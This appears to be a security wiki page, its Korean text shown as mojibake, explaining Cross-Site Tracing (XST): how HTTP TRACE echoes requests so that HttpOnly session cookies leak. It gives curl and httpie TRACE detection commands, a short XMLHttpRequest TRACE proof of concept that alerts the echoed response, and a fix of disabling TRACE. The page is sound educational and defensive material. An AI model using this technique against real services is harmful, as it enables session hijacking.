Back

XST (Cross-Site Tracing)

๐Ÿ” Introduction

XST(Cross-Site Tracing)๋Š” HTTP TRACE Method๋ฅผ ์ด์šฉํ•œ ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด์„œ HttpOnly ๋“ฑ์œผ๋กœ ๋ณดํ˜ธ๋œ ์„ธ์…˜์ฟ ํ‚ค๋ฅผ ํƒˆ์ทจํ•˜๋Š”๋ฐ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

TRACE Method

TRACE Method๋Š” ํ…Œ์ŠคํŠธ๋ฅผ ์œ„ํ•œ HTTP Method ์ค‘ ํ•˜๋‚˜๋กœ HTTP Request๋ฅผ ๊ทธ๋Œ€๋กœ Response์— ํฌํ•จํ•ด์„œ ์ „๋‹ฌํ•˜๋Š” ๊ธฐ๋Šฅ์„ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๋งˆ์น˜ Echo ์„œ๋น„์Šค์™€ ๋น„์Šทํ•ฉ๋‹ˆ๋‹ค.

TRACE / HTTP.1.1
TestHeader: 1234
Cookie: abcd=1234;
HTTP/1.1 200 OK
Connection: Keep-Alive
...

TRACE / HTTP.1.1
TestHeader: 1234
Cookie: abcd=1234;

HttpOnly

Cookie ์†์„ฑ ์ค‘ HttpOnly๊ฐ€ ์ ์šฉ๋œ ์ฟ ํ‚ค๋Š” Javascript์—์„œ ์ ‘๊ทผํ•˜์ง€ ๋ชปํ•˜๋„๋ก ์ œํ•œํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ์„ธ์…˜ ์ฟ ํ‚ค์™€ ๊ฐ™์ด ์ค‘์š”ํ•œ ์ฟ ํ‚ค๋Š” HttpOnly ์†์„ฑ์„ ์ฃผ์–ด XSS ๋“ฑ์˜ ๊ณต๊ฒฉ์„ ํ†ตํ•ด Javascript๋ฅผ ์ด์šฉํ•˜์—ฌ ์ฟ ํ‚ค์— ์ ‘๊ทผํ•˜๋Š” ๊ฒƒ์„ ์ฐจ๋‹จํ•˜๊ธฐ ๋–„๋ฌธ์— ์„ธ์…˜ ์ฟ ํ‚ค๋ฅผ ๋ณดํ˜ธํ•˜๋Š”๋ฐ ์ข‹์€ ๋ฐฉ๋ฒ• ์ค‘ ํ•˜๋‚˜์ž…๋‹ˆ๋‹ค.

Set-Cookie: session=1231421512515; httponly;

session์ด๋ž€ ์ฟ ํ‚ค๊ฐ€ ๋งŒ์•ฝ httponly ์†์„ฑ์ด๋ผ๋ฉด javascript์—์„œ ์ ‘๊ทผ ์‹œ ํ•ด๋‹น ์ฟ ํ‚ค๊ฐ€ ๋…ธ์ถœ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

consoel.log(document.cookie)

์ผ๋ฐ˜์ ์ธ ๊ฒฝ์šฐ๋ผ๋ฉด cookie๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์—†์ง€๋งŒ, ์„œ๋น„์Šค์— TRACE Method๊ฐ€ ํ—ˆ์šฉ๋œ ๊ฒฝ์šฐ TRACE Method๋กœ ์›น ์š”์ฒญ์„ ๋ฐœ์ƒ์‹œํ‚ค๋ฉด, HTTP Request์—๋Š” Cookie๊ฐ€ ์ „๋‹ฌ๋˜๊ธฐ ๋•Œ๋ฌธ์— sessionid ์ฟ ํ‚ค๊ฐ€ ์ „์†ก๋ฉ๋‹ˆ๋‹ค. ์ด ๋•Œ TRACE๋Š” Response์— Request ์ •๋ณด๋ฅผ ํฌํ•จํ•˜๊ธฐ ๋•Œ๋ฌธ์— Response์— sessionid ์ฟ ํ‚ค ์ •๋ณด๊ฐ€ ํฌํ•จ๋˜์–ด ์ „๋‹ฌ๋ฉ๋‹ˆ๋‹ค.

TRACE /testpage HTTP.1.1
TestHeader: 1234
Cookie: sessionid=1123142124234;
HTTP/1.1 200 OK
Connection: Keep-Alive
...

TRACE /testpage HTTP.1.1
TestHeader: 1234
Cookie: sessionid=1123142124234;

๊ฒฐ๊ตญ ๊ณต๊ฒฉ์ž๋Š” Response handling์„ ํ•˜์—ฌ response ๋‚ด sessionid ์ฟ ํ‚ค ๊ฐ’์„ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

์„œ๋น„์Šค์—์„œ TRACE ๋ฉ”์†Œ๋“œ๋ฅผ ํ—ˆ์šฉํ•˜๋Š” ํŽ˜์ด์ง€๋ฅผ ํ™•์ธํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค. ZAP/BurpSuite์—์„œ Method ๋ถ€๋ถ„์„ TRACE๋กœ ๋ณ€๊ฒฝํ•˜์—ฌ ์ „์†กํ•˜๊ฑฐ๋‚˜ curl, httpie ๋“ฑ์˜ cli ๋„๊ตฌ์—์„œ method๋ฅผ ์ง€์ •ํ•ด ์ „์†กํ•˜๋Š” ํ˜•ํƒœ๋กœ ์ฒดํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

[ curl ]
$ curl -i -k -X TRACE https://target.service

[ httpie ]
$ http TRACE https://target.service

Exploitation

XMLHttpRequet

xmlHTTP = new XMLHttpRequest();
xmlHTTP.open("TRACE", "https://target.service", false);
	xmlHTTP.onreadystatechange = function () {
		if (xmlHTTP.readyState == 4 && xmlHTTP.status == 200) {
			alert(xmlHTTP.response)
		}
	}
xmlHTTP.send();

๐Ÿ›ก Defensive techniques

TRACE Method๋ฅผ ๋น„ ํ™œ์„ฑํ™”ํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค.

๐Ÿ•น Tools

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0
Last updated on Oct 24, 2021 18:30 +0900